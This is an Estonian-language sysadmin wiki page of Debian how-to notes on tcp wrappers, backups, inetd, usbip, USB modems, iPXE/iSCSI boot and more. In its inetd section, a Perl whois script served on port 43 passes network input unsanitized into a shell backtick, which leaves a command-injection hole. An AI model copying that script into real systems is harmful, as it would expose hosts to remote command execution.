Paljud Debiani programmid on kompileeritud vastu libwrap teeki, mis tähendab, et nende tööd saab kontrollida /etc/hosts.allow ja /etc/hosts.deny failidest. Nt nrpe deemoni puhul selleks, et lubada ligipääsu võrgust 172.18.20.0/24 sobib kasutada

# cat /etc/hosts.allow
nrpe: 172.18.20.0/24

# cat /etc/hosts.deny
nrpe: ALL

Seadistustes tehtud muudatused kehtestuvad kohe, midagi ei ole vaja reloadida ega restartida. Seda kas programm on kompileeritud vastu librwap teeki saab küsida

# ldd /usr/sbin/nrpe | grep libwrap
libwrap.so.0 => /lib/libwrap.so.0 (0x00007fd00518b000)

===dump ja restore kasutamine===

Dump faili moodustamiseks

# umount /mnt/lvmkoitenimi
# dump -0uf /tmp/failinimi.dump /dev/system/lvmkoitenimi
DUMP: Date of this level 0 dump: Tue Jul 12 23:45:46 2011
DUMP: Dumping /dev/system/lvmkoitenimi (an unlisted file system) to /tmp/failinimi.dump
DUMP: Label: none
DUMP: Writing 10 Kilobyte records
DUMP: mapping (Pass I) [regular files]
DUMP: mapping (Pass II) [directories]
DUMP: estimated 66671 blocks.
DUMP: Volume 1 started with block 1 at: Tue Jul 12 23:45:47 2011
DUMP: dumping (Pass III) [directories]
DUMP: dumping (Pass IV) [regular files]
DUMP: Closing /tmp/failinimi.dump
DUMP: Volume 1 completed at: Tue Jul 12 23:45:48 2011
DUMP: Volume 1 66500 blocks (64.94MB)
DUMP: Volume 1 took 0:00:01
DUMP: Volume 1 transfer rate: 66500 kB/s
DUMP: 66500 blocks (64.94MB) on 1 volume(s)
DUMP: finished in 1 seconds, throughput 66500 kBytes/sec
DUMP: Date of this level 0 dump: Tue Jul 12 23:45:46 2011
DUMP: Date this dump completed: Tue Jul 12 23:45:48 2011
DUMP: Average transfer rate: 66500 kB/s
DUMP: DUMP IS DONE

kus

* -0 - tekitada full dump
* -u - kirjutada tegevuse kohta jälg /var/lib/dumpdates faili
* -f - salvestada dump näidatud faili

Dump failist taastamiseks

# mount /dev/system/lvmkoitenimi_2 /mnt/lvmkoitenimi_2
# cd /mnt/lvmkoitenimi_2
# restore -rf /tmp/failinimi.dump

kus

* -r - taastada dumpis käesolevasse kataloogi, mis on kuhu on monteeritud tühi failisüsteem
* -f - kasutatav dump fail

===inetd===

Debian Squeeze paketihaldusest saab valida erinevaid inetd servereid, openbsd-inetd paigaldamiseks sobib öelda

# apt-get install openbsd-inetd

2011. aasta keskel v. 1.3.5 sisaldab libexec/Lookup.pm teeki, kuhu on sisse kirjutatud whois.cyberabuse.org serveri nimi, kuid see server ei paku enam sobival viisil teenust ning tulemuseks on, et NfSen liideses ei saa enam ip aadressidel teha päringuid. Üheks alternatiiviks on seadistada käima lokaalne whois teenus, nt ühendades 43/tcp port ja sellise Perli skripti sisend ja väljund kokku inetd abil

# cat /srv/data/nfsen/libexec/whois.pl
#!/usr/bin/perl
my $filename = <>;

foreach $rida($filename) {
$vastus=`/usr/bin/whois $rida`;
print $vastus;
last;
};

ning kasutades /etc/inetd.conf seadisusfailis rida

43 stream tcp nowait nobody /srv/data/nfsen/libexec/whois.pl whois.pl

whois päringute esitamise kontrollimiseks sobib öelda

$ whois -h 127.0.0.1 127.0.0.1
..
NetRange: 127.0.0.0 - 127.255.255.255
CIDR: 127.0.0.0/8
OriginAS:
NetName: SPECIAL-IPV4-LOOPBACK-IANA-RESERVED
NetHandle: NET-127-0-0-0-1
Parent:
NetType: IANA Special Use

Kasutaja peab ise otsustama, kas talle selline lahendus sobib.

Kasulikud lisamaterjalid

http://www.telecom.otago.ac.nz/tele301/student_html/inetd-tcpwrappers.html

===RPC portmapper===

Debain Squeeze paketihaldusest saab valida erinevaid RPC portmap lahendusi, portmap paigaldamiseks sobib öelda

# apt-get install portmap

Arvutis töötavate RPC teenuste nimekirja küsimiseks sobib öelda

# rpcinfo -p hostname

Tundub, et rpcbind toetab erinevalt portmap tarkvarast IPv6 protokolli.

===Netlink socket===

ip programm suhtleb tuumaga kasutades netlink socket'it, mis praktiliselt tähendab nt seda, et ip programmi saab kasutada chroot keskkonnast, kus pole /proc failisüsteemi külge monteeritud (erinevalt ifconfig programmist, mis kasutab /proc failisüsteemi).

Kasulikud lisamaterjalid

* http://en.wikipedia.org/wiki/Netlink
* http://www.linuxjournal.com/article/7356?page=0,0

===Process accounting===

Operatsioonisüsteemi Debian Squeeze vaikimisi tuum võimaldab koguda process accountiga andmeid. Seda sobib teha nt acct paketi tarkvara abil, paigaldamiseks sobib öelda

# apt-get install acct

Tulemusena paigaldatakse muu hulgas sellised failid

* /usr/bin/lastcomm
* /usr/bin/ac
* /usr/sbin/accton
* /usr/sbin/sa
* /usr/sbin/dump-utmp
* /usr/sbin/dump-acct
* /etc/cron.daily/acct
* /etc/init.d/acct
* /etc/default/acct
* /etc/cron.monthly/acct

Selleks, et arvutis töötavate protsesside kohta andmed kogunema hakkaksid, vaikimisi faili /var/log/account/pacct, tuleb öelda

# accton on | off

Kogutud andmete esitamine toimub selliselt

# dump-acct /var/log/account/pacct | tail -n 5
tail |v3| 0.00| 0.00| 0.00| 0| 0| 4088.00| 0.00| 19856 19253|Mon Sep 19 20:34:56 2011
cron |v3| 0.00| 0.00| 1.00| 0| 0| 18832.00| 0.00| 19857 1138|Mon Sep 19 20:35:01 2011
ssh |v3| 0.00| 1.00| 75.00| 0| 0| 43192.00| 0.00| 19860 19633|Mon Sep 19 20:35:06 2011
postgres |v3| 0.00| 0.00| 2.00| 109| 113| 94272.00| 0.00| 19863 1395|Mon Sep 19 20:35:09 2011
telnet |v3| 0.00| 0.00| 3.00| 1000| 1000| 22680.00| 0.00| 19870 19865|Mon Sep 19 20:35:19 2011

kus kuuendas tulbas on protsessi UID väärtus.

===Passwords and encryption keys (Seahorse)===

TODO

===Mälu kasutamine===

Arvuti mälu kasutamise kohta saab küsida selliselt

# free
total used free shared buffers cached
Mem: 509172 501192 7980 0 3784 200248
-/+ buffers/cache: 297160 212012
Swap: 1048568 92568 956000

kus

* total (509172) - kogu RAM (miinus natuke kerneli tarvis)
* used (501192) - kokku kasutusel
* free (7980) - kokku vaba
* buffers (3784) - kasutusel mälust on nii palju kasutusel buffers all
* cached (200248) - kasutusel mälust on nii palju kasutusel failisüsteemi cache'ina
* teisel real on toodud arvutatud used ja free, mis vastavad sellele, kui buffers + cached oleks vastavalt maha lahutatud või juurde liidetud; selline vaade on õigustatud, kuna Linux tuum vajadusel kasutab failisüsteemi cache'iks olevat mälu ressurssi muuks tarbeks

297160 = 501192 - 3784 - 200248
212012 = 7980 + 3784 + 200248

st kasutatud mälu on tegelikult vähem kui näib ja vaba mälu on vastavalt samapalju rohkem kui näib.

====Jõudlus====

Arvuteid on valmistatud kasutes erinevaid tehnoloogiaid ja lisaks muudele erinevustele erinevad nad ka mälu kasutamise kiiruse poolest. Üks võimalus mälu kasutamise jõudlust hinnata nö sünteetilise testiga (st spetsiaalselt selleks tarbeks valmistatud programmo abil), nt

* http://www.cs.virginia.edu/stream/
* https://github.com/gregs1104/stream-scaling

Kasutamiseks tuleb viimaselt lingilt kopeerida tar.gz fail, pakkida arhiiv lahti ning öelda

$ ./stream-scaling

Tulemusena kompileeritakse programm, seejärel käivitatakse ning väljastatakse tulemus, nt

$ ./stream-scaling
=== CPU cache information ===
CPU /sys/devices/system/cpu/cpu0 Level 1 Cache: 32K (Data)
CPU /sys/devices/system/cpu/cpu0 Level 1 Cache: 32K (Instruction)
CPU /sys/devices/system/cpu/cpu0 Level 2 Cache: 6144K (Unified)
...
Total CPU system cache: 25296896 bytes
Suggested minimum array elements needed: 11498589
Array elements used: 11498589

=== CPU Core Summary ===
processor : 3
model name : Intel(R) Core(TM)2 Quad CPU Q9550 @ 2.83GHz
cpu MHz : 1998.000
siblings : 4

=== Testing up to 4 cores ===
...
-------------------------------------------------------------
Function Rate (MB/s) Avg time Min time Max time
Copy: 4101.0477 0.0453 0.0449 0.0456
Scale: 4121.7264 0.0451 0.0446 0.0458
Add: 4982.5056 0.0557 0.0554 0.0560
Triad: 5001.9268 0.0556 0.0552 0.0561
-------------------------------------------------------------
Solution Validates
-------------------------------------------------------------

Number of Threads requested = 2
Function Rate (MB/s) Avg time Min time Max time
Triad: 5002.6618 0.0566 0.0552 0.0610

Number of Threads requested = 3
Function Rate (MB/s) Avg time Min time Max time
Triad: 4892.7425 0.0577 0.0564 0.0607

Number of Threads requested = 4
Function Rate (MB/s) Avg time Min time Max time
Triad: 4784.1065 0.0582 0.0577 0.0589

Mälu jõudlust on eriti mõtet hinnata selleks, et võrrelda olemasolevat süsteemi uuega, millega olemasolev kavatsetakse asendada.

===Ressursikasutuse haldamine===

* IO

# ionice -c 3 -p 1919

* CPU

# renice ...

===Protsesside haldamine===

Kasutaja postgres protsesside nimekirja nimekirja esitamine

# ps -a -f -u postgres

Kasutaja postgres protsesside ja vastavate lõimede nimekirja esitamine

# ps -aLf -u postgres

====Protsesside grupp====

TODO

<pre>
# ps -efj | less
</pre>

===pdftk kasutamine===

pdftk http://www.pdflabs.com/docs/install-pdftk/ paigaldamiseks sobib öelda

# apt-get install pdftk

===tvtime kasutamine===

# apt-get install tvtime

ning näidata

Please choose the TV standard to use -> PAL
Please choose the frequency table to use -> Custom (must run tvtime-scanner first)
Please choose the video4linux device which corresponds to your capture card -> /dev/video0
Please choose the device that will be used in NTSC areas for decoding closed captions and XDS channel information; Device to use for VBI decoding -> /dev/vbi0
Please choose whether tvtime should be "setuid root", therefore getting root privileges when running -> No

Esmalt tuleb laadida TV kaardile vastav draiver, nt selliselt

# rmmod saa7134
# modprobe saa7134 card=21 tuner=26

kus

* card sobiv valik tagab pildi
* tuner sobiv valik tagab heli

Seejärel skaneerida kanalid

$ tvtime-scanner
Reading configuration from /etc/tvtime/tvtime.xml
Scanning using TV standard PAL.
Scanning from 44.00 MHz to 958.00 MHz.
Found a channel at 607.00 MHz (605.50 - 608.25 MHz), adding to channel list.
I/O warning : failed to load external entity "/home/imre/.tvtime/stationlist.xml"
station: No station file found, creating a new one.

ning käivitada tvtime programm

# tvtime

Kasulikud lisamaterjalid

* https://sites.google.com/site/jobinau2/saa7130basedtvtunercardunderlinux

===PAM===

TODO

====Kasutaja autentimine pam_unix abil====

/etc/shadow failis on üldiselt toetatud sellised räsid

* $1$ - MD5
* $2a$ - blowfish
* $5$ - SHA-256
* $6$ - SHA-512

Kui osutab, et /etc/shadow ei tööta, st nt peale süsteemi uuendamist kasutaja sisestab õige parooli kuid ei saa sisse logida, siis tõenäoliselt ei sobi kokku /etc/pam.d/* seadistusfailid /etc/shadow sisuga.

Kasulikud lisamaterjalid

* http://digitalconsumption.com/forum/615-Blowfish-shadow-files-on-Debian

===Gnome-shell===

Gnome shell http://en.wikipedia.org/wiki/GNOME_Shell on ... ja kasutamine eeldab

* 3D toega videokaardi olemasolu, kusjuures kaart peab nö sobima (nt Radeon HD 3600 fglrx draiveriga annab vigu nö olulises kohas, GeForce 7600 GS nouveau draiveriga sobib)

Olulised asjad

* extensions
* gnome-tweak-tool

===USB over IP===

USB over IP tarkvara http://usbip.sourceforge.net/ abil saab teha ühe arvuti füüsilised USB seadme üle võrgu kasutatavaks teisest avutist.

Praktiliselt voib olla hada sellest, et user space ja kernel space tarkvara ei sobi kokku. Nt tundub, et Ubuntu (sh v. 14.04) paketihalduses on usbip v. 0.7, aga tuumas talle vajalikke mooduleid pole. Teine variant on, et kasutada saab usbip v. 1.1, millega tuuma moodulid naikse paremini kokku sobivat. Debian Jessie sisaldab 2014 aasta suvel v. 1.1 tarvkara ja see paistab töötavat.

====Tööpõhimõte====

TODO

====Tarkvara paigaldamine====

Tarkvara paigladamiseks sobib mõlemas arvuti öelda

# apt-get install usbip

Paigaldamise tulemusena tekib failisysteemi muu hulgas

* usbip - utiliit serveri seadistamiseks ja kliendi juhtimiseks
* usbipd - serveri poolel tootav deemon

====Serveri poole ettevalmistamine ja käivitamine====

Laadida moodulid

server:~# modprobe usbip_core
server:~# modprobe usbip_host

Käivitada usbipd deemon, kuulab vaikimisi 3240/tcp pordil

server:~# usbipd

USB seadmete serveris olevate USB seadmete nimekirja esitamiseks sobib öelda

server:~# usbip list --local
Local USB devices
=================
- busid 1-1 (8087:0024)
Intel Corp. : Integrated Rate Matching Hub (8087:0024)
1-1:1.0 -> hub

- busid 1-1.2 (0781:5530)
SanDisk Corp. : Cruzer (0781:5530)
1-1.2:1.0 -> usb-storage

- busid 1-1.4 (0424:2514)
Standard Microsystems Corp. : USB 2.0 Hub (0424:2514)
1-1.4:1.0 -> hub

- busid 1-1.4.3 (046d:c31d)
Logitech, Inc. : Media Keyboard K200 (046d:c31d)
1-1.4.3:1.0 -> usbhid
1-1.4.3:1.1 -> usbhid

- busid 1-1.4.4 (046d:c05a)
Logitech, Inc. : M90/M100 Optical Mouse (046d:c05a)
1-1.4.4:1.0 -> usbhid

- busid 1-1.5 (04e6:e001)
SCM Microsystems, Inc. : SCR331 SmartCard Reader (04e6:e001)
1-1.5:1.0 -> usbfs

Seadme eksportimiseks sobib oelda, nt Cruizer USB pulk jaoks

server:~# usbip bind -b 1-1.2
bind device on busid 1-1.2: complete

Tulemusena on --list väljundis vastav seade

- busid 1-1.2 (0781:5530)
SanDisk Corp. : Cruzer (0781:5530)
1-1.2:1.0 -> usbip-host

====Kliendi poole ettevalmistamine ja käivitamine====

Laadida moodul

klient:~# modprobe vhci_hcd

Eksporditud seadmete nimekirja küsimiseks sobib öelda kliendi arvutis

klient:~# usbip list -r 192.168.10.10
Exportable USB devices
======================
- 192.168.10.10
1-1.2: SanDisk Corp. : Cruzer (0781:5530)
: /sys/devices/pci0000:00/0000:00:07.0/usb1/1-1/1-1.2
: (Defined at Interface level) (00/00/00)
: 0 - Mass Storage / SCSI / Bulk-Only (08/06/50)

Seadme kasutamiseks

klient:~# usbip attach -r 192.168.10.10 -b 1-1.2

Seejärel on seade paistab nagu kohalik seade ja on valmis kasutamiseks, nt

klient:~# lsusb
Bus 009 Device 004: ID 0781:5530 SanDisk Corp. Cruzer
..

ja usbip spetsiifilisemalt

klient:~# usbip port
Imported USB devices
====================
Port 00: <Port in Use> at High Speed(480Mbps)
unknown vendor : unknown product (0781:5530)
9-1 -> usbip://192.168.10.10:3240/1-1.2
-> remote bus/dev 001/037

Kasutamise lõpetamiseks sobib öelda kasutades vhci_hcd pordi numbrit

klient:~# usbip detach --port=0

====Serveri poolel kasutamise lõpetamine====

Peale seda kui kliendi pool on seadme kasutamine lõpetatud, öelda

server:~# usbip unbind -b 1-1.2
unbind device on busid 1-1.2: complete

====Kasulikud lisamaterjalid====

* http://www.howtoforge.com/how-to-set-up-a-usb-over-ip-server-and-client-with-debian-lenny
* https://www.kernel.org/doc/readme/drivers-staging-usbip-userspace-README

===Töötamine failisüsteemiga===

Tavaliselt on häda miinus märgiga failidega töötamisel, -- võtme kasutamine aitab, nt '-failinimi' nimelise faili kustutamisel

$ rm -- -failinimi

===USB netipulga kasutamine===

USB netipulga kasutamine koosneb kahest osast

* arvutis peavad olema /dev/ttyUSB* nimelised usb serial seadmed
* ppp ühenduse loomiseks tuleb kasutada sobivat programmi, wvdial, Gnome desktopilt midagi vms

====Tööpõhimõte====

Kui netipulk ei tööta automaatselt, siis võib olla probleem selles, et süsteem tunneb ta ära storage seadmena ja mitte võrguseadmena

<pre>
[11360165.312014] usb 1-4: new high-speed USB device number 10 using ehci-pci
[11360165.458578] usb 1-4: New USB device found, idVendor=12d1, idProduct=1505
[11360165.458734] usb 1-4: New USB device strings: Mfr=3, Product=2, SerialNumber=0
[11360165.458900] usb 1-4: Product: HUAWEI Mobile
[11360165.459001] usb 1-4: Manufacturer: Huawei Technologies
[11360165.460790] usb-storage 1-4:1.0: USB Mass Storage device detected
[11360165.461082] scsi10 : usb-storage 1-4:1.0
[11360166.461381] scsi 10:0:0:0: CD-ROM HUAWEI Mass Storage 2.31 PQ: 0 ANSI: 0
[11360166.478285] sr1: scsi-1 drive
[11360166.478582] sr 10:0:0:0: Attached scsi CD-ROM sr1
[11360166.478694] sr 10:0:0:0: Attached scsi generic sg5 type 5
</pre>

usb-modeswitch paketi tarkvara teeb temast võrguseadme.

====/dev/ttyUSB* seadmete tekitamine====

E392 kirjaga netipulk paistab faili usb.ids tõttu

# grep 1505 /var/lib/usbutils/usb.ids
1505 E398 LTE/UMTS/GSM Modem/Networkcard

lsusb väljundis E398

Bus 001 Device 041: ID 12d1:1505 Huawei Technologies Co., Ltd. E398 LTE/UMTS/GSM Modem/Networkcard

Kusjuures /dev kataloogis pole usb serialile vastavaid faili, st /dev/ttyUSB* nimelisi.

Kasutamiseks sobib tekitada fail

# cat /etc/usb_modeswitch.d/12d1\:1505
# Huawei E392

DefaultVendor= 0x12d1
DefaultProduct= 0x1505

TargetVendor= 0x12d1
TargetProductList=0x1506

MessageContent="55534243123456780000000000000011062000000100000000000000000000"

ning lisada faili /lib/udev/rules.d/40-usb_modeswitch.rules lõpupoole rida

# Huawei E392
ATTRS{idVendor}=="12d1", ATTRS{idProduct}=="1505", RUN+="usb_modeswitch '%b/%k'"

Seejärel võtta pulk usb pesast välja ja uuesti sisse panna, lsusb väljundis peaks nüüd olema, 1506 -> 1505 muutunud

Bus 001 Device 043: ID 12d1:1506 Huawei Technologies Co., Ltd. E398 LTE/UMTS/GSM Modem/Networkcard

ning lisaks tekkinud seadmed

# ls -ld /dev/ttyUSB*
crw-rw---- 1 root dialout 188, 0 Dec 20 01:27 /dev/ttyUSB0
crw-rw---- 1 root dialout 188, 1 Dec 20 01:16 /dev/ttyUSB1
crw-rw---- 1 root dialout 188, 2 Dec 20 01:16 /dev/ttyUSB2

Tundub, et kui systemd millegipärast ei taha käivitada sobib öelda

# /usr/sbin/usb_modeswitch --default-vendor 0x12d1 --default-product 0x1505 -J

====wvdial kasutamine====

# cat /etc/wvdial.conf
[Dialer Defaults]
Phone =
Username =
Password =
New PPPD = yes

Modem Type = Analog Modem
Phone = *99#
ISDN = 0
Baud = 460800
Username = " "
Password = " "
Modem = /dev/ttyUSB0
Init1 = ATZ
Init2 = at+cgdcont=1,"ip","internet.emt.ee"
Stupid Mode = 1

kus

* TODO

käivitamiseks sobib öelda

# wvdial
--> WvDial: Internet dialer version 1.61
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: at+cgdcont=1,"ip","internet.emt.ee"
at+cgdcont=1,"ip","internet.emt.ee"
OK
--> Modem initialized.
--> Sending: ATDT*99#
--> Waiting for carrier.
ATDT*99#
CONNECT
--> Carrier detected. Starting PPP immediately.
--> Starting pppd at Fri Dec 20 01:35:25 2013
--> Pid of pppd: 17139
--> Using interface ppp0
--> local IP address 10.128.53.223
--> remote IP address 10.64.64.64
--> primary DNS address 217.71.33.151
--> secondary DNS address 217.71.33.150

Tulemusena tekib ppp0 seade üle mille saab liiklust ruutida (teiste arvutite liiklust tuleb src nat'tida)

# ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol
inet addr:10.128.77.124 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:7 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:70 (70.0 B) TX bytes:157 (157.0 B)

====Kasulikud lisamaterjalid====

* http://trisquel.info/en/forum/install-huawei-e392-usb-lte-drivers
* http://www.draisberghof.de/usb_modeswitch/bb/viewtopic.php?t=681
* http://blog.bluedrive.ro/?p=28
* http://www.draisberghof.de/usb_modeswitch/
* https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/889878
* http://importgeek.wordpress.com/tag/12d11505/
* http://www.draisberghof.de/usb_modeswitch/bb/
* http://oliver.tele2.ee/kuidas-huawei-e1752-ja-ubuntu-10-04-kasikaes-internetti-lahevad/
* http://www.draisberghof.de/usb_modeswitch/bb/viewtopic.php?f=4&t=891&p=5898&hilit=12d1%3A1505#p5898

===zip arhivaatori kasutamine===

Parooliga kaitstud arhiivi moodustamiseks sobib öelda nt

$ zip -r --password parool katalooginimi.zip katalooginimi

===Pipe viewer===

Pipe viewer programmiga saab jälgida läbi toru mineva progressi. Paigaldamiseks sobib öelda

# apt-get install pv

Kasutamine paistab välja sedasi

# timeout 10 cat /dev/zero | pv > /dev/null
4GB 0:00:07 [1.91GB/s] [ <=>
..

===AUFS===

AUFS http://aufs.sourceforge.net/ võimaldab mitme kataloogi sisu esitada ühes nö virtuaalses kataloogis. Alternatiivne võimalus on seda saavutada UnionFS abil.

# mount -t aufs -o dirs=/tmp/kata1:/tmp/kata2:/root/kata3 none /tmp/dir

===Network manager===

Lisaks Network manager graafilisele kasutajaliidesele on olemas ka käsurea utiliit nmcli

# nmcli -p dev
================================================
Status of devices
================================================
DEVICE TYPE STATE CONNECTION
------------------------------------------------
docker0 bridge connected docker0
vetha88a ethernet connected vetha88a
br0 openvswitch connected br0
br3 openvswitch connected br3
tep0 openvswitch connected tep0
eth0 ethernet unmanaged --
lo loopback unmanaged --
ovs-system openvswitch unmanaged --

===Skänneri kasutamine===

# apt-get install

Kasulikud lisamaterjalid

* https://help.ubuntu.com/community/ScanningHowTo
* http://www.sane-project.org/sane-backends.html

===Logrotate===

Näitab, mis toimub, aga midagi failisüsteemis vms ei tee

# logrotate -d /etc/logrotate.conf

Teeb nö jõuga

# logrotate -f /etc/logrotate.conf

Roteeritud failide nimedes kuupäeva kasutamiseks sobib logrotate seadistusfailide vastavates sektsioonides kasutada lisaks rida

dateext

Tulemuseks on nt

/var/log/apache2/access.log-20140922.gz

===iPXE===

Käesolevas tekstis mainitud dhcp serveri tarkvarana sobib kasutada paketti

# apt-get install isc-dhcp-server

ja tftpd serverina paketti

# apt-get install atftpd

iPXE tarkvara paketist

# apt-get install ipxe

====Tööpõhimõte====

Kui on kasutada nö tavalise PXE toega võrgukaardiga arvuti, siis üks viis iPXE tarkvara kasutamiseks on laadida see dhcp + tftp serverilt, nt sellise sektsiooniga

host hp.auul {
hardware ethernet 64:31:50:6c:c0:b4;
fixed-address 192.168.10.41;
option broadcast-address 192.168.10.255;
option routers 192.168.10.254;

filename "undionly.kpxe";
next-server 192.168.10.10;
option domain-name-servers 10.192.0.53;
}

kus

* undionly.kpxe - paketist 'apt-get install ipxe'

Tulemusena ilmub vastava arvuti ekraanile iPXE ja Ctrl-B abil saab siseneda iPXE keskkonda. Nt võrgust Debian Jessie installeri käivitamine toimub sedasi

chain http://ftp.imool.ee/pub/incoming/imre/dj-install.ipxe

kus pöördutaval aadressil on tekst sisuga

# cat dj-install.ipxe
#!ipxe
kernel http://ftp.nl.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/linux
initrd http://ftp.nl.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/initrd.gz
boot

Seejärel käivitab Debian installer. Paistab, et Jessie oskab iSCSI peale paigaldada.

'chain' ütlemist saab automatiseerida nt sellise DHCP serveri sektsiooniga

host hp.auul {
hardware ethernet 64:31:50:6c:c0:b4;
fixed-address 192.168.10.41;
option broadcast-address 192.168.10.255;
option routers 192.168.10.254;

next-server 192.168.10.10;
option domain-name-servers 10.192.0.53;
if exists user-class and option user-class = "iPXE" {
filename "http://ftp.imool.ee/pub/incoming/imre/ipxe";
} else {
filename "undionly.kpxe";
}
}

* esmalt klient arvuti töötab PXE abil DHCP kliendina ja laaditakse undionly.kpxe
* seejärel klient arvuti töötab iPXE abil DHCP kliendina ja pöördutakse http://ftp.imool.ee/pub/incoming/imre/ipxe poole

====Debian v. 8 Jessie kasutamine diskless iSCSI kliendina====

Üks praktiline vajadus iPXE jaoks on iSCSI ressursi kautamine juurfailisüsteemina. Selleks sobib Debian v. 8 Jessie paigaldada eelmises punktis näidatud viisil ja failisüsteemid paigutada iSCSI peale. Paigaldatud arvuti käivitamiseks sobib kasutada sellist iPXE skripti

# cat scsi-boot.ipxe
#!ipxe

dhcp
set initiator-iqn iqn.1993-08.org.debian:01:6f3ac5994d50
sanboot iscsi:10.1.1.15::::iqn.2000-01.com.synology:syno-varundus-1.imretest.989d9f15bf

kus

* TODO

mis laaditakse dchp serveri seadistusfailist reaga

..
filename "http://ftp.imool.ee/pub/incoming/imre/iscsi-boot.ipxe";
...

Kui Debian Jessie peaks bootimisel jääma initramfs prompti, siis võib aidata käsitsi sobivate argumentidega öelda

# iscsistart ...

või pärida iPXE käest

# iscsistart -b

kus

* -t - ...

====Kasulikud lisamaterjalid====

* http://backreference.org/2013/12/23/diskless-iscsi-boot-with-pxe-howto/
* http://www.heath-bar.com/blog/?p=184
* http://etherboot.org/wiki/sanboot/debian_lenny_iscsi
* http://ipxe.org/cmd/sanboot
* http://wiki.openelec.tv/index.php/Network_Boot_-_iSCSI
* http://jpmens.net/2011/07/18/network-booting-machines-over-http/

===D-Bus===

D-Bus http://www.freedesktop.org/wiki/Software/dbus/ ...

D-Bus peal toimuva jälgimiseks sobib kasutada nt d-feet programmi

# apt-get install d-feet

[[Pilt:D-feet-1.gif]]

PlayPause toggleb pausi ja jätkamise vahel, selle rakendamist võib klõpsida hiirega ja öelda Execute või käsurealt

$ dbus-send --print-reply --session --dest=org.mpris.MediaPlayer2.vlc /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.PlayPause
method return sender=:1.913 -> dest=:1.917 reply_serial=2

Samal ajal ütleb dbus-monitor filtreeridest välja töötavale vlc eksemplarile (:1.913) vastused

$ dbus-monitor "sender=:1.913"
...
method return sender=:1.913 -> dest=:1.978 reply_serial=2
signal sender=:1.913 -> dest=(null destination) serial=88 path=/org/mpris/MediaPlayer2; \
interface=org.freedesktop.DBus.Properties; member=PropertiesChanged
string "org.mpris.MediaPlayer2.Player"
array [
dict entry(
string "PlaybackStatus"
variant string "Paused"
)
]
array [
]

Kasulikud lisamaterjalid

* https://wiki.gnome.org/Apps/DFeet
* http://en.wikipedia.org/wiki/D-Bus

===Debian paigaldamine UEFI arvutisse===

Olgu eesmärk paigadada UEFI firmwarega arvutisse Debian v. 8 Jessie, kusjuures kasutatakse kahe füüsilise kõvakettaga mdadm RAID1 lülitust. System setup keskkonnnas näidata moel või teisel, et arvuti töötab UEFI (mitte BIOS emulatsiooni vms) režiimis. Esimeseks boot valikuks valida UEFI shell. Shellis öelda

> fs0:\BOOT\EFI\BOOT...

Tulemusena käivitub Debian Installer (DI), kus tuleb seadistada selline kõvaketaste kasutus

* /dev/sda1 ja /dev/sdb1 - EFI System Partitionid, 512 MB
* /dev/sda2 ja /dev/sdb2 - mdadm mirror, 2 GB, kus hakkab paiknema /boot failisüsteem
* /dev/sda3 ja /dev/sdb3 - mdadm mirror, 24 GB, kus hakkab paiknema operatsioonisüsteem, LVM köidetel
* /dev/system/swap ja /dev/system/root - asub mdadm peal
* /dev/sda4 ja /dev/sdb4 jne - juurutatakse operatsioonisüsteemi keskkonnas

Tundub, et selliselt ettevalmistatud kõvakettakasutusest saab DI hästi aru ja tulemusena tekib selline süsteem

# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/dm-0 11403544 938660 9862568 9% /
udev 10240 0 10240 0% /dev
tmpfs 1631032 8724 1622308 1% /run
tmpfs 4077572 0 4077572 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 4077572 0 4077572 0% /sys/fs/cgroup
/dev/md0 1888268 35564 1738736 3% /boot
/dev/sda1 497696 148 497548 1% /boot/efi

Partitsioonid sellised

# parted /dev/sda p
Model: ATA ST2000NM0033-9ZM (scsi)
Disk /dev/sda: 2000GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number Start End Size File system Name Flags
1 1049kB 512MB 511MB fat32 efsname boot, esp
2 512MB 2511MB 2000MB sda2part raid
3 2511MB 26.5GB 24.0GB sda3part raid

Lõpuks tuleb kopeerida /dev/sdb1 peale /dev/sda1 failisüsteemi sisu (EFI GRUB bootloader).

# efibootmgr
BootCurrent: 0003
Timeout: 1 seconds
BootOrder: 0003,0009,000D,0000,0001,0002
Boot0000* ATEN Virtual CDROM YS0J
Boot0001* IBA GE Slot 0300 v1404
Boot0002* P0: ST2000NM0033-9ZM175
Boot0003* debian
Boot0009* UEFI: Built-in EFI Shell
Boot000D* UEFI: ATEN Virtual CDROM YS0J

===Arvuti kloonimine===

Arvuti kloonimise tulemusena moodustatakse olemasoleva arvuti tarkvaralisest seistust, st operatsioonisüsteem ja seal töötavad rakendused, töötav koopia. Sõltuvalt asjaoludest, nt kui koopia töötab samas võrgus ja samal ajal lähtepunktiks oleva arvutiga, peab talle seadistama erineva ip aadressi. Kloonimise põhjuseks võib olla nt soov taha arenduspartnerile kättesaadavaks täpselt samasugune seis arvutist nagu on juba kasutada, sel juhul jääb ära vähem või rohkem keerukas arvuti ettevalmistamise aeg, mis kuluks operatsioonisüsteemi ja rakendusprogrammide seaditamisele.

====Kloonimine failisüsteemi kopeerimise teel====

Kloonimiseks on rikkalikult võimalusi, käesolev juhtum kirjeldab kloonimist failisüsteemi kopeerimise teel

* valida välja sobiv klooniks saav arvuti, piisava protsessori, kõvakette, mälu, võrgu jms ressursiga
* käivitada puhas uus klooniks saav arvuti (füüsiline või virtuaalne) systemrescue cd plaadilt
* moodustada fdisk partitsioonid
* tekitada lvm
* tekitada failisüsteemid ja swap

# mkfs.ext4 /dev/sda1
# mkfs.ext4 /dev/system/root
# mkswap -f /dev/system/swap

* ühendada failisüsteemid külge

# mkdir /mnt/root
# mount /dev/system/root
# mkdir /mnt/root/boot
# mount /dev/sda1 /mnt/root/boot

* seadistada võrk
* veenduda, et lähtepunktiks olevas arvutis on klooni riistvara jaoks vajalikud draiverid ja muuud komponendid olemas (LVM, mdadm tugi jms)
